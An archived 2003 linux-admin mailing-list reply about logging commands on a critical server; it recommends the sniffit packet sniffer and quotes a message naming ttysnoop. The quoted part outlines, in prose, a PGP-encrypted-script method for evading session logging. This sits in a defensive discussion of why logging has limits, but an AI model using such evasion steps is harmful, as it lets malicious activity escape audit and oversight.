From: Saint Neon <neo_chanakya@yahoo.com>
To: Glynn Clements <glynn.clements@virgin.net>
Cc: linux-admin@vger.kernel.org
Subject: Re: critical server commands logging
Date: Sat, 11 Jan 2003 21:29:02 -0800 (PST) [thread overview]
Message-ID: <20030112052902.40492.qmail@web40812.mail.yahoo.com> (raw)
In-Reply-To: <15904.33994.285524.349582@cerise.nosuchdomain.co.uk>
This is somewhat unconventional, but works.
You could sniffer programs on your server, without too
much worries about load.
sniffit is a good program. You can find it here:
http://reptile.rug.ac.be/~coder/sniffit/sniffit.html
You can specify the host connections that you want to
log. The configuration file packs lots of punch and
power into it.
Neon.
--- Glynn Clements <glynn.clements@virgin.net> wrote:
>
> urgrue wrote:
>
> > there was some kind of "virtual tty" program, it
> might even have been a
> > kernel patch.
> > if i remember correctly it allows you to capture
> every keystroke and even
> > screen output.
> > im sorry i dont remember the name, maybe someone
> else does.
>
> Probably ttysnoop and/or telnetsnoopd (a "snooping"
> version of
> telnetd).
>
> However, this will only get you so far. Someone who
> is actively trying
> to do something malicious without getting caught can
> find a way around
> almost any logging mechanism which you install.
>
> E.g. logging the telnet/ssh connection can be
> circumvented by the
> following method:
>
> 1. Log in.
> 2. Generate a PGP key-pair.
> 3. Display the public key (i.e. send it back to the
> client).
> 4. Send a script which has been encrypted with the
> public key.
> 5. Decrypt the script.
> 6. Execute the script.
> 7. Delete the PGP key-pair.
>
> As the private key is never sent over the
> connection, you have no way
> of seeing what's in the script.
>
> If you think that the above would look suspicious,
> bear in mind that
> there are a great many ways in which the process can
> be obfuscated.
>
> Consider the situation where the user creates a text
> file (e.g. a
> script) by using a text editor (e.g. vi)
> interactively; deducing the
> exact contents of the file by examining the
> keystrokes which are
> logged is far from trivial.
>
> --
> Glynn Clements <glynn.clements@virgin.net>
> -
> To unsubscribe from this list: send the line
> "unsubscribe linux-admin" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at
http://vger.kernel.org/majordomo-info.html
__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com
next prev parent reply other threads:[~2003-01-12 5:29 UTC|newest]
Thread overview: 8+ messages / expand[flat|nested] mbox.gz Atom feed top
2003-01-11 17:42 critical server commands logging Prashant Desai
2003-01-11 18:46 ` Stephen Satchell
2003-01-11 20:24 ` urgrue
2003-01-11 20:35 ` Mike Dresser
2003-01-11 20:55 ` Glynn Clements
2003-01-12 5:29 ` Saint Neon [this message]
-- strict thread matches above, loose matches on Subject: below --
2003-01-11 17:42 Prashant Desai
2003-01-11 18:26 `
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20030112052902.40492.qmail@web40812.mail.yahoo.com \
--to=neo_chanakya@yahoo.com \
--cc=glynn.clements@virgin.net \
--cc=linux-admin@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).